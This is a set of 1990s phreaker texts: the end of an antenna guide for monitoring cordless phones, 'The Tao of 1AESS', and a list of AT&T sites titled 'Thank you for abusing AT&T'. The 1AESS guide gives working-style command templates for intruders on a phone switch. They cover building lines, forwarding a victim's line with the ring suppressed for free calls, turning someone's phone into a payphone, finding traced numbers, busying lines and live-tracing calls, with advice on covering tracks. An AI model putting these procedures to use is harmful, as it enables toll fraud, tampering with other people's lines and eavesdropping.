- frequencies used in cordless phones. The following is a very
- effective, yet easy to build, "homebrew" antenna.
-
- CORDLESS DIPOLE
- ---------------
- materials needed:
- wire - virtually any type will suffice
- matching transformer (RS part number 15-1296)
- f connector (RS part number 278-225)
- ??? connector (this will connect the antenna to the scanner, so it
- will be dependant upon what type of antenna jack the scanner
- utilizes. Most use a BNC-type connector. Some older models
- will use a Motorola-type connector.)
- coax cable - while many types of coax can be used, a low-loss cable
- would be best, especially if a long cable run is required.
- RG-6 satellite coax (RS part number 278-1316) is a good choice.
-
-
- wire transformer wire
- -------------------------< >-------------------------
- + f connector
- |
- | coax
- |
- |
- * connector
- [ ] scanner
-
- =================================================================
-
- CHART 11 - 1/4 WAVE GROUND PLANE ANTENNA
-
- Here is a simple-to-build antenna that will improve reception for
- a particular frequency area.
-
- materials needed:
- wire - a rigid wire is needed here. Clothes hangers work well.
- panel mount SO-239 connector (RS part number 278-201)
- male PL-259 connector (RS part number 278-205)
- coax cable
- connector (to scanner)
-
-
- |
- |
- |
- |
- [ ]
- / \
- / \
- / \
-
-
- The length of the five rods will be dependant upon the frequency
- you intend to monitor. Use the following formula:
-
- WL=3X10^8/F
-
- WL = wavelegnth (in meters)
- F = frequency (in MHz)
-
-
- <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
-
-
-
- -=-
-
- -= The Tao of 1AESS =-
- -=-=-=-=-=-=-=-=
- -= DeadKat&Disorder =-
-
- -=-
-
- -= Special thanks to Gatsby and Mark Tabas =-
-
-
- Introduction
- -=-=-=-=-=-=
- The Bell System's first trial of electronic switching took place in Morris,
- Illinois, in 1960. The Morris trial culminated a 6-year development and
- proved the viability of the stored-program control concept. The first
- application of electronic local switching in the Bell System occurred in May
- 1965 with the cutover of the first 1ESS switch in Succasunna, New Jersey.
-
- The 1ESS switching system was designed for use in areas where large numbers
- of lines and lines with heavy traffic (primarily business customers) are
- served. The system has generally been used in areas serving between 10,000
- and 65,000 lines and has been the primary replacement system for urban
- step-by-step and panel systems. The ease and flexibility of adding new
- services made 1ESS switching equipment a natural replacement vehicle in
- city applications where the demand for new, sophisticated business and
- residence services is high.
-
- In 1976, the first electronic toll switching system to operate a digital
- time-division switching network under stored-program control, the 4ESS
- system, was placed in service. It used a new control, the 1A processor,
- for the first time to gain a call carrying capacity in excess of 550,000
- busy-hour calls. The 1A processor was also designed for local switching
- application. It doubled the call-carrying capacity of the 1ESS switching
- system and was introduced in 1976 in the first 1AESS switch. The network
- capacity of 1ESS switching equipment was also doubled to allow the 1AESS
- switch to serve 130,000 lines.
-
- In addition to local telephone service, the 1AESS switches offer a variety
- of special services. Custom Local Area Switching Services (CLASS) are
- available as well Custom Calling Services. Business customers may select
- offerings such as centrex, ESS-ACS, Enhanced Private Switched Communications
- Service, or electronic tandem switching.
-
- Although more modern switches like 5ESS and DMS 200 have been developed, it
- is estimated that some 50 percent of all switches are still 1AESS.
-
- Commands
- -=-=-=-=
- The 1AESS uses a command line interface for all commands. The commands are
- divided into three fields: action, identification, and data. The fields
- are always separted by a colon. Every command is terminated by either a
- period for verification commands or a 'ballbat' (!) for change commands.
- The control-d is used to execute the command instead of a return. The
- underscore is used as a backspace. Commands are always typed in 'all caps'.
-
- The action field is the first field of the command and is ended by a colon.
- The identification field is ended by the second colon. The identification
- field has one or two subfields which are separated by a semicolon. Semicolons
- are not used elsewhere in the command. The data field consists of keyword
- units and is the remaining portion of the command.
-
- Basic Machine Commands
- -=-=-=-=-=-=-=-=-=-=-=
- These commands provide useful information from the system. The WHO-RV-
- command will tell you what CO it is and what version of the OS is installed.
- If your output is scrolling off the screen press space to end scrolling.
- The V-STOP- command will clear the buffer.
-
- WHO-RV-. System information.
- SPACE Stops output from scrolling.
- V-STOP-. Free buffer of remaining LENS/INFO.
-
- Channel Commands
- -=-=-=-=-=-=-=-=
- Channel commands are used to redirect input and output. If a switch won't
- respond to a command use the OP:CHAN command to check on current channel.
- If your channel is not responding, use the MON:CHAN command to switch output
- and control to your terminal (the remote). You can check the status of the
- RC with the RCCENSUS command.
-
- OP:CHAN:MON! Shows all channels which are being monitored.
- MON:CHAN SC1;CHAN LOC! Redirect output to remote screen.
- STOP: MON;CHAN SC1;CHAN LOC! Redirect output to local screen.
- (This command needs to be done after you
- are finished to help cover your tracks)
- OP:RCCENSUS! To see recent change status.
-
-
- Tracing Commands
- -=-=-=-=-=-=-=-=
- CI-LIST- will give you a list of all numbers which are being traced
- externally. It will not show you lines which are being traced
- internally, ie: numbers inside one of the prefixes controlled
- by the switch you are on.
-
- CI-LIST-. Traced line list.
-
-
- Check Features on Line
- -=-=-=-=-=-=-=-=-=-=-=
- The VF command is used to check the current settings on a line.
- The DN XXXXXXX specifies the phone number of the line you wish to check.
- Replace XXXXXXX with the seven digit phone number of the line you are
- checking.
-
- VF:DNSVY:FEATRS,DN XXXXXXX,1,PIC! Check features of a line.
- VF:DNSVY:DN XXXXXXX,1,LASFTRS! Display last Features
-
- Call Features CWT- Call Waiting
- CFB- Call Forward Busy - Busy=VM
- CFV- Call Forwarding Variable
- CFD- Call Forward Don't answer
- TWC- Three Way Calling
- TTC- Touch Tone
- RCY- Ring Cycle
- SC1- Speed Calling 1
- SC2- Speed Calling 2
- UNA- No Long Distance
- PXX- Block all LD service (guess)
- MWI- Message Waiting Indicator
- CHD- centrex(unremarkable)
- CPU- centrex(unremarkable)
- CLI- Calling Line Identification (CID)
- ACB- Automatic Call Back Feature (?)
- BLN- Special Toll Billing
- FRE- Free Calling
-
- The standard output of a command appears below. The 'DN 348 2141' specifies
- the number you are checking. The calling features will be listed on the
- second line by their three letter acronyms. This line has call waiting
- (CWT), a trace (TRC), and touch tone dialing (TTC).
-
- Example of 1A output:
-
- M 53 TR75 2 DN 348 2141 00000003
- CWT TRC TTC
-
-
- Searching For Free Lines
- -=-=-=-=-=-=-=-=-=-=-=-=
- The VFY command can be used to check if a line is in use. The output will
- list the LEN (Line Equipment Number) for the line and its call features in
- octal. If the LEN is all zeros, then that number has not been assigned.
- Replace XXXXXXX with the number you wish to check. You must prefix the
- phone number with 30. You can also check for unused LEN's using the VFY
- command. Use the space bar to stop scrolling and the V-STOP command to
- cancel when looking up free LEN's.
-
- VFY-DN-30XXXXXXX. Search for free lines.
- VFY-LEN-4100000000. List all free LENs.
- VFY-TNN-XXXXXXXX. To get information on trunk.
-
- The output for the VFY-DN command will appear like the one below. Notice
-
- that this number has been assigned a LEN so it is in use.
-
- M 06 TR01 796 9146
- 0 0 0 0
- LEN 01 025 000
- 001 000 000 000 000 000 4
- 000 000 000 000 000 000 000 000
- 0 0 0 0
- 0 0 0 0 0
-
-
- Searching for a Particular Feature on a Line (like trace)
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- All line information is stored in the switch for its coverage area. The
- switch is like a huge database in this sense. You can do global searches
- on the switch for any feature. One especially interesting feature to search
- for are traced numbers. Traced numbers listed this way are INTERNALLY
- traced as opposed to globally traced numbers shown with the CI-LIST- command.
- Global and internal trace lists are always very different. And remember,
- be a good samaritan and call the person being traced and let them know! ;-)
-
- VF:DNSVY:FEATRS,EXMATCH TRACE! Pull all numbers IN switch area with
- trace on it (takes a sec).
-
- You can exmatch for any LASS feature by replacing the keyword TRACE with any
- call feature like call forwarding (CFB) and speed calling (SC1).
-
-
- To See What Numbers Are on a Speed Calling List
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- Another nice use for the VFY command is to see what is on a line's speed
- calling list. Replace XXXXXXX with the target phone number. One devious
- use is to look at the CO's speed call list to find other internal telco
- numbers.
-
- VFY-LIST-09XXXXXXX020000
- 09=mask 02=single list (one digit speed calling)
- 20=double list (two digit speed calling)
- 28= " "
- 36= " "
- 44= " "
-
-
- To Build a Line
- -=-=-=-=-=-=-=-
- The recent change command (RC) is used to create and modify lines. Because
- RC commands are usually very long and complex, they are typed on multiple
- lines to simplify them. Each subfield of the data section of the command is
- typed on a separate line ended by a slash (\) followed by pressing ctrl-d.
- To create a line, you specify LINE in the identification field. Before
- a line can be created, you must first locate an unused number by using the
- VFY-DN command explained above. Once a free number has been found, you
- use the VFY-LEN to find an available LEN. To build a new line, follow
- these steps:
-
- First, find spare LEN (VFY-LEN-4100000000.). Next find free line. Now type
- in the RC commands using the following commands as a template:
-
- RC:LINE:\ (create a line)
- ORD 1\ (execute the command immediately)
- TN XXXXXXX\ (telephone number)
- LEN XXXXXXXX\ (len found from above)
- LCC 1FR\ (line class code 1fr)
- CFV\ (call forward)
- XXX 288\ (type XXX, space, then the three digit PIC)
- ld carrier - 222 - MCI
- 288 - AT&T
- 333 - Sprint, etc.)
- ! (BEWM, don't forget the ctrl-d!!)
-
- (Look for RCXX blah blah ACPT blah - This means the RECENT CHANGE
- has taken affect)
-
-
- Creating Call Forwarding Numbers
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- The call forwarding feature is the most important feature for hackers. By
- creating a line or modifying an existing line with call forwarding, you can
- than use it to make free phone calls. You set the line to call forward/
- no ring and then give it the call forwarded number. This will allow you
- to call the modified line and be instantly forwarded to your pre-chosen
- destination.
-
- First create a line using RC:LINE:, then modify the line using the following
- commands as a template.
-
- RC:CFV:\ (add call forwarding to a line.. begin: )
- ORD 1\ (execute the command immediately)
- BASE XXXXXXX\ (base number you are changing)
- TO XXXXXXX\ (local - XXXXXXX : ld - XXXXXXXXXX )
- PFX\ (set prefix to 1 if ld)
- ! (BEWM)
-
-
- To Change Call Forward Number
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- It is safer to modify an existing call forward than to create a new line
- solely for this purpose. You can use the VFY command and EXMATCH for CFB to
- find lines with call forwarding. Before you can change the call forwarding
- 'TO' number you must delete the old one. Remove call forward number using
- CFV:OUT with the template below.
-
- RC:CFV;OUT:\ (remove call forward number...begin: )
- ORD 1\ (execute command immediately)
- BASE XXXXXXX\ (number to remove it from)
- ! (Yeeee-Hahhhahah)
-
-
- Make Call Forward Not Ring
- -=-=-=-=-=-=-=-=-=-=-=-=-=
- The only drawback to call forwarding off someone's line is if rings they
- might answer. To get around this, you add the call-forward no-ring option
- (ICFRR) using the following as a template.
-
- RC:LINE;CHG:\ (recent change line to be specified)
- ORD 1\ (execute command immediately)
- TN XXXXXXX\ (number you wanna fuck with)
- ICFRR\ (this takes the ring off)
- ! (Go!)
-
-
- Adding a feature to a line
- -=-=-=-=-=-=-=-=-=-=-=-=-=
- The RC:LINE;CHG: can also be used to add any other call feature. Use the
- same template but change the feature.
-
- RC:LINE;CHG:\ (this is used for changing features)
- ORD 1\ (order number)
- TN XXXXXXX (telephone number you are fucking with)
- TWC\ (replace this with any feature you wish)
- ! (Fire!)
-
-
- Removing a Feature
- -=-=-=-=-=-=-=-=-=
- Use the NO delimiter to remove a feature from a line.
-
- RC:LINE;CHG:\ (change a feature)
- ORD 1\ (effective immediately)
- TN XXXXXXX\ (telephone number)
- CFV NO\ (feature followed by NO)
- ! (Boo-Ya!)
-
-
- Change Phone number into payphone
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- You've read about in the Hacker Crackdown, now you too can be 31337 and
- change Gail Thackery's phone into a payphone. In fact you can change the
- line class code (LCC) to anything you want. To display the LCC of a line
- use the following and replace the XXXXXXX with the line you wish to view.
-
- VF:DNSVY:LCC,DN XXXXXXX,1,PIC! (display line class code)
- DTF = Payphone
- 1FR = Flat Rate
- 1MR = Measured Rate
- 1PC = One Pay Phone
- CDF = DTF Coin
- PBX = Private Branch Exchange
- CFD = Coinless(ANI7) Charge-a-call
- INW = InWATS (800!@#)
- OWT = OutWATS
- PBM = O HO/MO MSG REG (NO ANI)
- PMB = LTG = 1 HO/MO (Regular ANI6)
- (ani6 and ani7 - only good for DMS)
-
- To change the line into a payphone use the RC:LINE;CHG command and modify
- the LCC like the example below.
-
- RC:LINE;CHG;\ (this is used for changing features)
- ORD 1\ (order number)
- TN XXXXXXX\ (telephone number you are fucking with)
- LCC DTF\ (line class code you are changing to)
- ! (Make it so.)
-
- *(You may have to remove some LASS features when doing this)*
-
-
- To Kill a Line and Remove It Permanently
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- If you need to delete a line you have created (or haven't) use the following
- syntax.
-
- RC:LINE;OUT:\ (remove line)
- ORD 1\ (effective immediately)
- TN XXXXXXX\ (on this number)
- ! (GO!)
-
-
- Monitoring Phone Calls
- -=-=-=-=-=-=-=-=-=-=-=
- There are powerful utilities to monitor calls and affect phone lines
- available on a 1A. The T-DN- commands allow you to check the current
- status of line and make it busy or idle. If a line happens to be active
- you can use the NET-LINE- command to trace the call and find the numbers
- for both calling parties.
-
- T-DN-RD XXXXXXX. See if call in progress.
- output: =1 line busy
- =0 line idle
- T-DN-MB XXXXXXX. Make line busy.
- T-DN-MI XXXXXXX. Make line idle.
- NET-LINE-XXXXXXX0000. To do a live trace on a phonenumber thru
- switch.
- NET-TNN-XXXXXX Same as above for trunk trace
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
- Appendix 1 - Common output messages seen on 1A switches
- -=-=-=-=-=
-
- ** ALARM **
-
- AR01 Office alarm
- AR02 Alarm retired or transferred
- AR03 Fuse blown
- AR04 Unknown alarm scan point activated
- AR05 Commercial power failure
- AR06 Switchroom alarm via alarm grid
- AR07 Power plant alarm
- AR08 Alarm circuit battery loss
- AR09 AMA bus fuse blown
- AR10 Alarm configuration has been changed (retired,inhibited)
- AR11 Power converter trouble
- AR13 Carrier group alarm
- AR15 Hourly report on building and power alarms
-
- ** AUTOMATIC TRUNK TEST **
- AT01 Results of trunk test
-
- ** CARRIER GROUP **
- CG01 Carrier group in alarm
- CG03 Reason for above
-
- ** COIN PHONE **
- CN02 List of pay phones with coin disposal problems
- CN03 Possible Trouble
- CN04 Phone taken out of restored service because of possible coin fraud
-
- ** COPY **
- COPY Data copied from one address to another
-
- ** CALL TRACE **
- CT01 Manually requested trace line to line, information follows
- CT02 Manually requested trace line to trunk, information follows
- CT03 Intraoffice call placed to a number with CLID
- CT04 Interoffice call placed to a number with CLID
- CT05 Call placed to number on the CI list
- CT06 Contents of the CI list
- CT07 ACD related trace
- CT08 ACD related trace
- CT09 ACD related trace
-
- ** DIGITAL CARRIER TRUNK **
- DCT COUNTS Count of T carrier errors
-
- ** MEMORY DIAGNOSTICS **
- DGN Memory failure in cs/ps diagnostic program
-
- ** DIGITAL CARRIER "FRAME" ERRORS **
- FM01 DCT alarm activated or retired
- FM02 Possible failure of entire bank not just frame
- FM03 Error rate of specified digroup
- FM04 Digroup out of frame more than indicated
- FM05 Operation or release of the loop terminal relay
- FM06 Result of digroup circuit diagnostics
- FM07 Carrier group alarm status of specific group
- FM08 Carrier group alarm count for digroup
- FM09 Hourly report of carrier group alarms
- FM10 Public switched digital capacity failure
- FM11 PUC counts of carrier group errors
-
- ** MAINTENANCE **
- MA02 Status requested, print out of MACII scratch pad
- MA03 Hourly report of system circuits and units in trouble
- MA04 Reports condition of system
- MA05 Maintenance interrupt count for last hour
- MA06 Scanners,network and signal distributors in trouble
- MA07 Successful switch of duplicated unit (program store etc.)
- MA08 Excessive error rate of named unit
- MA09 Power should not be removed from named unit
- MA10 OK to remove paper
- MA11 Power manually removed from unit
- MA12 Power restored to unit
- MA13 Indicates central control active
- MA15 Hourly report of # of times interrupt recovery program acted
- MA17 Centrex data link power removed
- MA21 Reports action taken on MAC-REX command
- MA23 4 minute report, emergency action phase triggers are inhibited
-
- ** MEMORY **
- MN02 List of circuits in trouble in memory
-
- ** NETWORK TROUBLE **
- NT01 Network frame unable to switch off line after fault detection
- NT02 Network path trouble Trunk to Line
- NT03 Network path trouble Line to Line
- NT04 Network path trouble Trunk to Trunk
- NT06 Hourly report of network frames made busy
- NT10 Network path failed to restore
-
- ** OPERATING SYSTEM STATUS **
- OP:APS-0
- OP:APSTATUS
- OP:CHAN
- OP:CISRC Source of critical alarm, automatic every 15 minutes
- OP:CSSTATUS Call store status
- OP:DUSTATUS Data unit status
- OP:ERAPDATA Error analysis database output
- OP:INHINT Hourly report of inhibited devices
- OP:LIBSTAT List of active library programs
- OP:OOSUNITS Units out of service
- OP:PSSTATUS Program store status
-
- ** PLANT MEASUREMENTS **
- PM01 Daily report
- PM02 Monthly report
- PM03 Response to a request for a specific section of report
- PM04 Daily summary of IC/IEC irregularities
-
- ** REPORT **
- REPT:ADS FUNCTION Reports that a ADS function is about to occur
- REPT:ADS FUNCTION DUPLEX FAILED No ADS assigned
- REPT:ADS FUNCTION SIMPLEX Only one tape drive is assigned
- REPT:ADS FUNCTION STATE CHANGE Change in state of ADS
- REPT:ADS PROCEDURAL ERROR You fucked up
- REPT:LINE TRBL Too many permanent off hooks, may indicate bad cable
- REPT:PROG CONT OFF-NORMAL System programs that are off or on
- REPT:RC CENSUS Hourly report on recent changes
- REPT:RC SOURCE Recent change system status (RCS=1 means RC Channel inhibited)
-
- ** RECENT CHANGE **
- RC18 RC message response
-
- ** REMOVE **
- RMV Removed from service
-
- ** RESTORE **
- RST Restored to service status
-
- ** RINGING AND TONE PLANT **
- RT04 Status of monitors
-
- ** SOFTWARE AUDIT **
- SA01 Call store memory audit results
- SA03 Call store memory audit results
-
- ** SIGNAL IRREGULARITY **
- SIG IRR Blue box detection
- SIG IRR INHIBITED Detector off
- SIG IRR TRAF Half hour report of traffic data
-
- ** TRAFFIC CONDITION **
- TC15 Reports overall traffic condition
- TL02 Reason test position test was denied
- TL03 Same as above
-
- ** TRUNK NETWORK **
- TN01 Trunk diagnostic found trouble
- TN02 Dial tone delay alarm failure
- TN04 Trunk diag request from test panel
- TN05 Trunk test procedural report or denials
- TN06 Trunk state change
- TN07 Response to a trunk type and status request
- TN08 Failed incoming or outgoing call
- TN09 Network relay failures
- TN10 Response to TRK-LIST input, usually a request from test position
- TN11 Hourly, status of trunk undergoing tests
- TN16 Daily summary of precut trunk groups
-
- ** TRAFFIC OVERLOAD CONDITION **
- TOC01 Serious traffic condition
- TOC02 Reports status of less serious overload conditions
-
- ** TRANSLATION ** (shows class of service, calling features etc.)
- TR01 Translation information, response to VFY-DN
- TR03 Translation information, response to VFY-LEN
- TR75 Translation information, response to VF:DNSVY
- ** **
- TW02 Dump of octal contents of memory
-
- Trace Output Appearance (COT - Customer Oriented Trace)
- A 03 CT04 22 03 02 05 11 26 359 705 8500 <-- NUMBER CALLED
- CPN 212 382 8923 <-- WHO CALLED
-
- 01/14/95 22:03:02 <-- TIME/DATE
- #236 <-- JOB NUMBER
-
-
- Appendix 2 - Miscellaneous 1A Commands found on logs from CO dumpsters:
- -=-=-=-=-=
-
- RMV::NPC 69!
- UTL::QRY.CMAP 136!
- UTL::QRY.SCON to 135! (as far out as to 12003!)
- UTL::QRY.SCON 13615/01!
- UTL::QRY.ALMS!
- UTL::QRY,WHO!
- UTL::QRY,ALL!
- UTL::QRY,FPKG!
- UTL::QRY,UNIT1,FTMI1, EQL
- GRTH::UNIT1! (FT100) <-- comment written by command
- GRTH::UNI1,FTMI1, EQL(L,R) (2,2) <-- Example
- UTL::QRY.!
- RMV::LINK 3!
- DGN::LINK 3!
- RST::LINK 3!
- UTL::QRY.TPS!
-
- RST::TAPE! (This and the next two commands were
- UTL::BMTR.FROM DISK.TO TAPE! ALWAYS found together, and are pretty
- RMV::TAPE! obvious)
-
- SDIS::FROM 11204/03.TO 11204/04!
- UTL::QRY.SCON.CH.TO 11204!
- UTL::QRY.CMAP.TO 11204/03!
- UTL::QRY,CMAP 01117!
- SCON::RATE 96.FROM 11204/03.TO 11204/4!
- LOGIN::USER DAX\
- UTL::EQD,NPCS!
- ADD::LINK 2,NPCAD E!
-
- UTL::LOC,ETSI 101!
- |_|____________Bay (These show physical locations
- |____________Unit of trunks)
-
- UTL::LOC,NPC 01117!
- output - 1-01-38
- |__|__|_________Bay
- |__|_________Unit
- |_________38(1/8) inches
-
-
- Appendix 3 - Suggested reading
- -=-=-=-=-=
-
- Acronyms 1988 (Phrack #20, file 11)
- Central Office Operations by Agent Steal (LoDTJ #4, file 4)
- ESS & 1A Switching Systems by Ninja Master
- The Fine Art of Telephony by Crimson Flash (Phrack #38, file 7)
- Guide to 5ESS by Firm G.R.A.S.P. (Phrack #43, file 16)
- Lifting Ma Bell's Cloak of Secrecy by VaxCat (Phrack #24, file 9)
- Operator Services Position System by Bandito (Phun #5, file 8)
- Peering Into the soul of ESS by Jack the Ripper (Phun #5, file 2)
-
- __________________________________________________________________________
- (C)opywrong 1995, DeadKat Inc.
- All wrongs denied.
-
- <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
-
-
-
- ▀▀▀▀▀▀▀▀▀
- ▀─────▀▀▀▀▀▀▀▀▀▀
- ▀▀────────▀▀▀▀▀▀▀▀▀▀ ┌────────────────────────────┐
- ▀▀──────────▀▀▀▀▀▀▀▀▀▀ │ Thank you for abusing AT&T │
- ▀▀───────────▀▀▀▀▀▀▀▀▀▀▀ └────────────────────────────┘
- ▀▀▀─────────▀▀▀▀▀▀▀▀▀▀▀▀ Part II
- ▀▀▀──────▀▀▀▀▀▀▀▀▀▀▀▀▀
- ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ by Major & Dead Kat
- ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
- ▀▀▀▀▀▀▀▀
-
-
-
- Some of the "Frequently Visited AT&T Locations":
-
- LOCATION CITY ST/ZIP TELEPHONE
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~ ~~~~~~~~ ~~~~~~~~~~~
-
- AT&T 1 PERIMETER PARK S. BIRMINGHAM AL 35243 205-969-4000
- BIRMINGHAM AMO 300 CHASE PK.SO., RIVERCHASE BIRMINGHAM AL 35243 205-988-9300
- MONTGOMERY MMC 2855 SELMA HIGHWAY MONTGOMERY AL 36108 205-281-6200
- AT&T 3280 DAUPHIN ST., BLDG B MOBILE AL 36606 205-470-1000
- LITTLE ROCK WORKS 7600 INTERSTATE #30 LTTL ROCK AR 72209 501-569-4411
- AT&T 10825 #2 FINANCIAL CNTR. SUITE 300 LTTL ROCK AR 72211 501-223-1000
- PHOENIX WORKS 505 N.51ST AVE PHOENIX AZ 85002 602-233-5000
- AT&T MICROELECT. SALES 432 N. 44TH ST. PHOENIX AZ 85008 602-204-1100
- PHOENIX CAC 3750 W. INDIAN SCHOOL RD. PHOENIX AZ 85019 602-269-6666
- AT&T 333 S. BEAUDRY AVE. L.A. CA 90017 213-481-9100
- AT&T 333 S. BEAUDRY AVE. L.A. CA 90017 213-482-5799
- LOS ANGELES CP (SVC) 2400 YATES AVE L.A. CA 90040 213-726-5000
- CYPRESS INNST. 6300 GATEWAY DR. CYPRESS CA 90630 714-220-6200
- AT&T MICROELEC. SLES 6300 GATEWAY DR. CYPRESS CA 90630 714-220-6223
- AT&T 200 NO. WESTLAKE BLVD. SUITE 103 TH.OAKS CA 91362 805-373-9390
- VANDENBURG AFB FED. SYS LOMPOC CA 93437 805-866-1611
- AT&T FED SYS 3201 SKYWAY DR. SAN MONICA CA 93455 805-349-8649
- AT&T 1111 E. HERNDON AVE. SUITE 31 FRESNO CA 93710 209-449-4200
- AT&T SAND HILL RD SUITE 216 MENLO PARK CA 94025 415-324-6000
- AT&T 224 AIRPORT PKWY SAN JOSE CA 94086 408-452-3200
- SUNNYVALE REG. CTR. 1090 E. DUANE AVE. SUNNYVALE CA 94086 408-522-4000
- HAYWARD SVC 1288 SAN LUIS OBISPO AVE. HAYWARD CA 94544 415-475-5000
- AT&T 4430 ROSEWOOD DR. PLEASANTON CA 94566 415-224-1000
- AT&T 1717 DOOLITTLE DR. SN LEANDRO CA 94577 415-678-1000
- SAN RAMON AMO BLD 2440 CAMINO RAMON SAN RAMON CA 94583 415-830-4300
- AT&T 2201 BROADWAY OAKLAND CA 94612 415-273-2800
- PACIFIC REGION MMC 3301 INDUSTRIAL AVE. ROCKLIN CA 95677 916-645-8911
- AT&T 8950 CALIFORNIA CNTR. DR. SACRAMENTO CA 95826 916-361-4600
- DENVER SVC CNTR. 11900 E. CORNELL AVE. AURORA CO 80014 303-368-2000
- AT&T 3190 S. VAUGHN WAY AURORA CO 80014 303-695-5000
- AT&T BMG 6200 S. SYRACUSE WAY ENGLEWOOD CO 80111 303-850-7000
- AT&T-NS SALES 707 17TH ST. DENVER CO 80202 303-291-4001
- DENVER SVC 2551 E. 40TH AVE. DENVER CO 80205 303-291-4200
- DENVER WORKS 1200 W. 120TH AVE DENVER CO 80234 303-538-1200
- AT&T-BL DENVER NO. 12110 PECOS ST. WESTMNSTR CO 80234 303-538-1813
- AT&T-BL 11900 N. PECOS ST. DENVER CO 80234 303-538-4011
- AT&T 7979 E. TUFTS AVE. DENVER CO 80237 303-290-3100
- AT&T 13952 DENVER WEST PKWY. GOLDEN CO 80401 303-273-2000
- AT&T FED SYS 6200 S. SYRACUSE WAY ENGLEWOOD CO 80401 303-793-8800
- AT&T-NS SALES 6300 GATEWAY DR. CYPRESS CO 90630 714-220-6200
- AT&T 8 TWO MILE RD FARMINGTON CT 06032 203-678-3800
- ORANGE CUST. REPAIR CTR. 50 BOSTON POST RD. ORANGE CT 06477 203-795-4721
- CONNECTICUT AMO 2750 DIXWELL AVE HAMDEN CT 06518 203-287-4070
- AT&T 777 LONGRIDGE RD STAMFORD CT 06851 203-845-5600
- AT&T 1825 I ST. N.W. SUITE 800 WASHINGTON DC 20006 202-429-1300
- WASH-DC 1120 20TH ST.,NW WASHINGTON DC 20006 202-457-2000
- AT&T 222 DELAWARE AVE. WILMINGTON DE 19801 302-888-6000
- AT&T 1401 E. BELMONT ST. PENSACOLA FL 32501 904-432-7454
- AT&T 151 S. WYMORE RD ALTA SPGS. FL 32714 407-869-2200
- AT&T 2301 MAITLAND CTR. PKWY. MAITLAND FL 32751 407-660-3200
- AT&T 2400 MAITLAND CTR. PKWY. MAITLAND FL 32751 407-660-3200
- AT&T 850 TRAFALGAR COURT MAITLAND FL 32751 407-660-3200
- AT&T 901 LAKE DESTINY DR. ORLANDO FL 32809 407-875-4400
- AT&T 8221 EXCHANGE DRIVE ORLANDO FL 32809 407-850-3000
- AT&T 6039 S. RIO GRANDE AVE. ORLANDO FL 32809 407-850-8000
- AT&T MICROELECT.9333 S. JOHN YOUNG PKWY ORLANDO FL 32819 407-345-6000
- AT&T 9701 S. JOHN YOUNG PARKWAY ORLANDO FL 32819 407-351-7100
- AT&T 100 WEST CYPRESS CREEK FT. LAUD. FL 33309 305-493-6100
- ATLANTA WKS 2000 NORTHEAST EXPRESSWAY NORCROSS GA 30071 404-447-2000
- AT&T FED SYS. 1975 LAKESIDE PKWAY TUCKER GA 30085 404-496-8200
- AT&T MICROELECT. SALES 3295 RIVER EXCH.DR NORCROSS GA 30092 404-390-5000
- AT&T 1200 PEACHTREE ST. NE ATLANTA GA 30309 404-390-5000
- ATLANTA FOC 7840 ROSEWELL RD. ATLANTA GA 30328 404-390-5000
- ATLANTA S. CTR. 6701 ROSEWELL RD. NE. ATLANTA GA 30328 404-573-4000
- AT&T 2970 CLAIRMONT RD. 4TH FL ATLANTA GA 30329 404-248-2126
- ATLANTA SVC 5885 FULTON IND'L BLVD. SW. ATLANTA GA 30336 404-346-4000
- ATL-ACCTS PAY 365 NORTHRIDGE RD. ATLANTA GA 30338 404-392-8900
- AT&T 2800 CENTURY CTR. PKWY ATLANTA GA 30345 404-320-3800
- ATLANTA DATA SYS 211 PERIMETER CTR. PKWY ATLANTA GA 30346 404-399-0100
- ATLANTA FIN.OPS MORGAN FLS ROSEWELL RD.,NE. ATLANTA GA 30350 404-390-5000
- AT&T 2300 NORTHLAKE CTR. TUCKER GA 30350 404-496-8200
- AT&T MMC INTERSTATE 80 & HIGHWAY 630 UNDERWOOD IA 51519 712-566-3300
- ROLLING MEADOWS 3800 GOLD RD. ROLNG MDWS IL 60008 708-290-2000
- AT&T MICROELECT. SALES 500 PARK BLVD ITASCA IL 60143 312-855-6300
- AT&T 150 MARTINDALE RD SHAUMBERG IL 60173 708-605-5000
- AT&T REPAIR & SRV. CTR. 1700 HAWTHORNE LN. W CHICAGO IL 60185 312-293-5100
- AT&T DATA SVCS 180 HANSEN CT. WOODDALE IL 60191 708-860-8100
- AT&T FED SYS 1411 OPUS PLACE DOWNERS GR IL 60515 708-810-4000
- AT&T 1111 W. 22ND ST. OAKBROOK IL 60521 708-571-5320
- UIS SHOWCASE 2600 WARRENVILLE RD. LISLE IL 60532 708-260-7900
- NWSW CTR. 2600 WARRENVILLE RD. LISLE IL 60532 708-510-4000
- NWSW CTR. CORPORATE LAKES 2500 CABOT DRIVE LISLE IL 60532 708-510-4000
- LISLE PS 850 WARRENVILLE RD. LISLE IL 60532 708-719-1005
- AT&T LISLE CTR 4513 WESTERN AVE. LISLE IL 60532 708-810-6000
- CEO-WEST 1195 SUMMER HILL DRIVE LISLE IL 60532 708-971-5000
- MONTGOMERY WORKS 800 S. RIVER ST. MONTGOMERY IL 60538 708-859-4000
- WARRENVILLE 28W. 615 FERRY RD. WARRENVILE IL 60555 708-393-8000
- INDIAN HILL COURT 1000 E. WARRENVILLE RD. NAPERVILLE IL 60566 708-305-3000
- IH PARK-BL 200 PARK PLAZA NAPERVILLE IL 60567 708-979-2000
- AT&T ONE S. WACKER DRIVE CHICAGO IL 60606 708-592-6558
